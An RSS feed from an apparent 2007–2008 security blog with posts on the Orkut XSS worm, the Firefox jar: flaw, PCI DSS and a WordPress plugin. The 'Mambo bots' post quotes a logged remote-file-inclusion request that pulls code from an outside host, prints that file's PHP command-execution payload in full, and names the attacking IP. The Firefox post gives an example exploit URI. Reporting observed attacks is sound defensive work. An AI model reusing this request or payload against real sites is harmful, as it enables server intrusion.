<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>ICMPECHO &#187; webapps</title>
	<atom:link href="http://www.icmpecho.com/category/webapps/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.icmpecho.com</link>
	<description>More than your usual type 8's</description>
	<pubDate>Thu, 20 Nov 2008 00:53:32 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.3</generator>
	<language>en</language>
			<item>
		<title>WP-plugin for automated upgrades</title>
		<link>http://www.icmpecho.com/2008/10/27/wp-plugin-for-automated-upgrades/</link>
		<comments>http://www.icmpecho.com/2008/10/27/wp-plugin-for-automated-upgrades/#comments</comments>
		<pubDate>Mon, 27 Oct 2008 10:59:38 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[misc]]></category>

		<category><![CDATA[personal]]></category>

		<category><![CDATA[webapps]]></category>

		<category><![CDATA[1.2]]></category>

		<category><![CDATA[keith dsouza]]></category>

		<category><![CDATA[plugin]]></category>

		<category><![CDATA[wordpress automatic upgrade]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/?p=1059</guid>
		<description><![CDATA[
&#160;
Just want to give everyone a pointer at this great WP plugin:
&#160;
WordPress Automatic Upgrade
&#160;
So far I&#8217;ve gone through three Wordpress upgrades with this plugin and it works great. It allows for easy backup of both files and databases and makes the transition between versions very seamless and smooth.
&#160;
Credits to Keith Dsouza!
&#160;
]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://www.icmpecho.com/images/wordpress_black.jpg" alt="Wordpress" border=1/></center><br />
&nbsp;<br />
Just want to give everyone a pointer at this great WP plugin:<br />
&nbsp;<br />
<strong><a href="http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-12-release.html">WordPress Automatic Upgrade</a></strong><br />
&nbsp;<br />
So far I&#8217;ve gone through three Wordpress upgrades with this plugin and it works great. It allows for easy backup of both files and databases and makes the transition between versions very seamless and smooth.<br />
&nbsp;<br />
Credits to <a href="http://techie-buzz.com/about-us">Keith Dsouza</a>!<br />
&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2008/10/27/wp-plugin-for-automated-upgrades/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Orkut XSS worm infected 400,000 users</title>
		<link>http://www.icmpecho.com/2007/12/19/orkut-xss-worm-infected-400000-users/</link>
		<comments>http://www.icmpecho.com/2007/12/19/orkut-xss-worm-infected-400000-users/#comments</comments>
		<pubDate>Wed, 19 Dec 2007 12:58:54 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[webapps]]></category>

		<category><![CDATA[orkut]]></category>

		<category><![CDATA[web application security]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/2007/12/19/orkut-xss-worm-infected-400000-users/</guid>
		<description><![CDATA[Seems like Orkut (the google social networking site) got hit with a pretty nasty XSS worm.
It did not do anything malicious (fortunately) to the users whose profiles were infected, but probably caused a quite high load on the Orkut systems and joined all infected users into a group called &#8220;Infectados pelo Vírus do Orkut&#8220;.
The description [...]]]></description>
			<content:encoded><![CDATA[<p>Seems like <a href="http://www.orkut.com">Orkut</a> (the google social networking site) got hit with a pretty nasty <a href="http://en.wikipedia.org/wiki/Xss">XSS</a> worm.</p>
<p><strong>It did not do anything malicious (fortunately)</strong> to the users whose profiles were infected, but probably caused a quite high load on the Orkut systems and joined all infected users into a group called &#8220;<em>Infectados pelo Vírus do Orkut</em>&#8220;.</p>
<p>The description of that particular group described the motivation for the hack and the main point seems to be the illustration of the insecurity in web applications such as Orkut.</p>
<p>For more information, including source code for the virus, see: <a href="http://antrix.net/journal/techtalk/orkut_xss.html">Antrix.net</a> or <a href="http://www.gnucitizen.org/blog/the-orkut-xss-worm">GNUCITIZEN</a>&#8217;s posts on the subject.</p>
<p>These kinds of issues are raising serious concerns over services such as &#8220;<a href="http://docs.google.com/">Google Docs</a>&#8221; (online office applications) and the upcoming <a href="http://blogs.zdnet.com/Google/?p=121">gDrive</a> and one might pose the question:</p>
<p><strong>Do you trust Google with your data?</strong></p>
<p><em><strong>** Update **</strong></p>
<p>More reading regarding this incident:</em></p>
<p><a href="http://sylvanvonstuppe.blogspot.com/2007/12/orkut-worm.html">Sylvan von Stuppe - Orkut Worm</a><br />
<a href="http://asert.arbornetworks.com/2007/12/orkut-xss-worm/">Arbor Networks - Orkut XSS Worm</a><br />
<a href="http://www.sophos.com/security/blog/2007/12/900.html">SophosLabs - Large scale Orkut virus outbreak not cool</a><br />
<a href="http://blog.trendmicro.com/orkutgoogle-worms-compromise-over-400000-accounts/">TrendMicro - Orkut/Google worms Compromise over 400,000 accounts</a></p>
<p><em>Cheers,</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2007/12/19/orkut-xss-worm-infected-400000-users/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Mambo bots</title>
		<link>http://www.icmpecho.com/2007/12/12/mambo-bots/</link>
		<comments>http://www.icmpecho.com/2007/12/12/mambo-bots/#comments</comments>
		<pubDate>Wed, 12 Dec 2007 15:02:47 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[exploit]]></category>

		<category><![CDATA[malware]]></category>

		<category><![CDATA[webapps]]></category>

		<category><![CDATA[mambo]]></category>

		<category><![CDATA[pearl]]></category>

		<category><![CDATA[RFI]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/2007/12/12/mambo-bots/</guid>
		<description><![CDATA[On the 11&#8242;th of December (04:17:52) I recieved the following request to this site:
&#8220;GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1&#8243;
Looks like someone is trying to exploit a RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it&#8230; Must be a lot of unpatched fish in the internet [...]]]></description>
			<content:encoded><![CDATA[<p><strong>On the 11&#8242;th of December (04:17:52) I recieved the following request to this site</strong>:</p>
<p><em>&#8220;GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1&#8243;</em></p>
<p>Looks like someone is trying to exploit a <a href="http://www.frsirt.com/english/advisories/2006/2561">RFI vulnerability in Pearl for Mambo</a>. This particular issue was disclosed over a year ago and they are still scanning for it&#8230; Must be a lot of unpatched fish in the internet tubes&#8230;</p>
<p>The file that is supposed to be included is live and contains the following:</p>
<blockquote><p><?php<br />
echo "549821347819481&lt;br&gt;";<br />
$cmd="id";<br />
$eseguicmd=ex($cmd);<br />
echo $eseguicmd."&lt;br&gt;";<br />
function ex($cfe){<br />
$res = '';<br />
if (!empty($cfe)){<br />
if(function_exists('exec')){<br />
@exec($cfe,$res);<br />
$res = join("\n",$res);<br />
}<br />
elseif(function_exists('shell_exec')){<br />
$res = @shell_exec($cfe);<br />
}<br />
elseif(function_exists('system')){<br />
@ob_start();<br />
@system($cfe);<br />
$res = @ob_get_contents();<br />
@ob_end_clean();<br />
}<br />
elseif(function_exists('passthru')){<br />
@ob_start();<br />
@passthru($cfe);<br />
$res = @ob_get_contents();<br />
@ob_end_clean();<br />
}<br />
elseif(@is_resource($f = @popen($cfe,"r"))){<br />
$res = "";<br />
while(!@feof($f)) { $res .= @fread($f,1024); }<br />
@pclose($f);<br />
}}<br />
return $res;<br />
}<br />
exit;</p></blockquote>
<p>The attacking host was:</p>
<blockquote><p>
80.237.200.81 (jam.seppenra.de)<br />
Windows CE, Generic Gecko<br />
Cologne, Germany,DE,50.9333,6.95<br />
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007</p></blockquote>
<p>What about doing error checking verifying that the target contains vulnerable code? Doesn&#8217;t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.</p>
<p>Anyhow, this gave me a good idea which I will present in a future post.</p>
<p><strong>All involved system owners has been notified.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2007/12/12/mambo-bots/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firefox JAR: vulnerability - quick summary</title>
		<link>http://www.icmpecho.com/2007/11/14/firefox-jar-vulnerability-quick-summary/</link>
		<comments>http://www.icmpecho.com/2007/11/14/firefox-jar-vulnerability-quick-summary/#comments</comments>
		<pubDate>Thu, 15 Nov 2007 00:22:24 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[exploit]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[webapps]]></category>

		<category><![CDATA[firefox]]></category>

		<category><![CDATA[jar]]></category>

		<category><![CDATA[recap]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/2007/11/14/firefox-jar-vulnerability-quick-summary/</guid>
		<description><![CDATA[For those of you that has not been following the computer security news and blogs there is a new vulnerability in town, and it&#8217;s nasty.
The problem lies in the jar: protocol implementation used by Firefox and it enables an attacker to conduct XSS and gives them almost limitless possibilitys for malware hosting.
This is an example [...]]]></description>
			<content:encoded><![CDATA[<p><strong>For those of you that has not been following the computer security news and blogs there is a new vulnerability in town, and it&#8217;s nasty.</strong></p>
<p>The problem lies in the<strong> <em>jar:</em> protocol implementation used by Firefox</strong> and it enables an attacker to conduct XSS and gives them almost limitless possibilitys for malware hosting.</p>
<p>This is an example URI which exploits the issue:</p>
<p align="center"><font color="#ffcc99"><strong>jar:http://www.icmpecho.com/myjarshrine/yarihooo.jpg!/malwareloadingscript.html</strong></font></p>
<p><strong>Now, instead of copying others work which they have probably spent hours or more on</strong> to explain the issue in full, I&#8217;ll give you a short recap of the happenings and more and more exposing blog posts:</p>
<hr /> <strong>2007-02-08 - <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=369814" target="_blank">Jesse Ruderman logs the bug in the Mozilla bugzilla tracker</a>.</strong> It remains unpatched and not widely known until&#8230;<strong>2007-11-07 - <a href="http://www.gnucitizen.org/blog/web-mayhem-firefoxs-jar-protocol-issues">Researcher pdp discusses the issue and potential impact at GNUCitizen</a>.</strong> This opens this bug up to a whole new audience and&#8230;<strong>2007-11-10 - <a href="http://blog.beford.org/?p=8" target="_blank">Beford illustrates the seriousness of this issue and issues in the same family</a></strong> by targeting Google and Gmail and posts a  <strong><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=403331" target="_blank">new bug entry</a></strong>.<strong>2007-11-10 - <a href="http://www.gnucitizen.org/blog/tomorrows-trojan-peddlers">And then Mario posts at GNUCitizen about other attack vectors</a></strong> including malware- and exploit-hosting.<br />
<hr />During these last days we have also seen some very strange recommendations from leading scurity experts at <a href="http://blogs.zdnet.com/security/?p=652" target="_blank">ZDNet</a>, <a href="http://secunia.com/advisories/27605/" target="_blank">Secunia</a> and <a href="http://www.kb.cert.org/vuls/id/715737" target="_blank">US Cert</a> (and one at <a href="http://www.theregister.co.uk/2007/11/12/jar_vuln/" target="_blank">The register</a> as well) as the most excellent <a href="http://hackademix.net/2007/11/13/a-jar-of-misleading-advices/trackback/" target="_blank">Giorgio over at the Hackademix blog</a>.</p>
<p>The problems with the recommendations given by these persons and/or organisations is mainly that the <strong>recommend blocking URI&#8217;s containing JAR: in webfilters and deep packet inspecting firewalls or avoid following &#8220;jar:&#8221; links</strong>.You should understand why this would be a total waste of time if you have read the above articles and in particular Giorgio&#8217;s comments on the issue.</p>
<p>Also you should know why if you have <a href="http://en.wikipedia.org/wiki/Iframe">seen one page load another</a> like in most web based exploits (<a href="http://www.sr.se/cgi-bin/ekot/artikel.asp?Artikel=1717140" target="_blank">Including the one on the Swedish Parliament&#8217;s websites this week</a> (swedish link, sorry)). My feeling is that the first advisories were rushed out &#8220;to be first in the corporate sector&#8221; and sloppy research took its toll.</p>
<p><strong>If you do want to protect yourselves for real</strong>, you might wanna download and install <a href="http://noscript.net/faq#jar" target="_blank">the <strong>NoScript extension</strong> to Firefox which also handles JAR</a>.</p>
<p>Happy times! <img src='http://www.icmpecho.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2007/11/14/firefox-jar-vulnerability-quick-summary/feed/</wfw:commentRss>
		</item>
		<item>
		<title>PCI DSS, err&#8230; C(as in circumventable)DSS</title>
		<link>http://www.icmpecho.com/2007/11/12/pci-dss-err-cas-in-circumventabledss/</link>
		<comments>http://www.icmpecho.com/2007/11/12/pci-dss-err-cas-in-circumventabledss/#comments</comments>
		<pubDate>Mon, 12 Nov 2007 22:15:23 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[networking]]></category>

		<category><![CDATA[programming]]></category>

		<category><![CDATA[standards]]></category>

		<category><![CDATA[webapps]]></category>

		<category><![CDATA[PCI DSS]]></category>

		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/2007/11/12/pci-dss-err-cas-in-circumventabledss/</guid>
		<description><![CDATA[I downloaded and listened in on the web application security talk that Jeremiah Grossman (WhiteHat Security (coordinators of the talk), Robert &#8220;RSnake&#8221; Hansen (SecTheory), Chris Paggen (Cisco) and Jordan Wiens (Network Computing) had. This was an unscripted roundtable discussion and it was very interesting to me, as I&#8217;m not so skilled in the areas that [...]]]></description>
			<content:encoded><![CDATA[<p>I downloaded and listened in on the web application security talk that <strong>Jeremiah Grossman</strong> (WhiteHat Security (coordinators of the talk), <strong>Robert &#8220;RSnake&#8221; Hansen</strong> (SecTheory),<strong> Chris Paggen </strong>(Cisco) and <strong>Jordan Wiens </strong>(Network Computing) had. This was an unscripted roundtable discussion and it was very interesting to me, as I&#8217;m not so skilled in the areas that they discussed (getting there, more on that in later posts). Full info on the talk can be found at:</p>
<p><a href="http://jeremiahgrossman.blogspot.com/2007/11/live-online-roundtable-episode-1.html" target="_blank">http://jeremiahgrossman.blogspot.com/2007/11/live-online-roundtable-episode-1.html</a></p>
<p>For me, the part of the talk dealing with <strong>WAF&#8217;s (<a href="http://www.cgisecurity.com/questions/webappfirewall.shtml" target="_blank">web application firewalls</a>) and normalization of input</strong> was quite interesting. As discussed, there really is no good way to do it if the customer or developer do not know they way his server and webapps handles input (and output for that matter) and which features are needed. However, if there is good documentation of the webapp that is to be protected, you might get away with some normalization (and then why not do it). WAF&#8217;s in general is not something you &#8220;just plug in&#8221; and some more fine tuning will most likely be needed if normalization is something that you want to do.</p>
<p>Another thing that i thought was actually more interesting, was hearing these people that are specialists on web security discuss the <strong>PCI DSS</strong> and what their experience and comments on it were.</p>
<p><strong>One good thing </strong>with the PCI DSS is that for an CTO/Administrator/Security engineer that is really dedicated to providing good security for his company and it&#8217;s clients, the standard can be used to push up security budgets and raise awareness in upper-management. However, the money will also have to be well spent, and that&#8217;s where some of the participants see a problem.</p>
<p>That problem is that companys and departments with dedicated budgets <strong>will try to hold down costs</strong>, sometimes even if they have the money needed for a thorough security solution, all for increased profit. This in turn might lead them to cheaper and less reliable certified scanners and vulnerability testers, that might not find holes where there actually are plenty. What does this lead to? Well, not much for those trying to fill the PCI&#8217;s requirements, as they will still pass (AND with no problems detected, wohooo). The cost, as usual, ends up with the customer that gets his or hers creditcard-data stolen from the site.</p>
<p><a href="http://ha.ckers.org/blog/20071111/passing-pci-subversively/" target="_blank">An update on this were posted by RSnake</a> (one of the participants) on the 11/11-07.</p>
<p>Another topic regarding the PCI DSS that was discussed was it&#8217;s unclarity in certain paragraphs that might lead to  total or partial circumvention of the upholding of the standard. No comments regarding this but it does indeed sound pretty serious if that&#8217;s the case <img src='http://www.icmpecho.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>More information on the <a href="http://en.wikipedia.org/wiki/PCI_DSS" target="_blank"><strong>PCI DSS</strong> here</a>. And I also recommend you all to visit the link in the top of this post and listen to the whole webinar.</p>
<p>Cheers,</p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2007/11/12/pci-dss-err-cas-in-circumventabledss/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
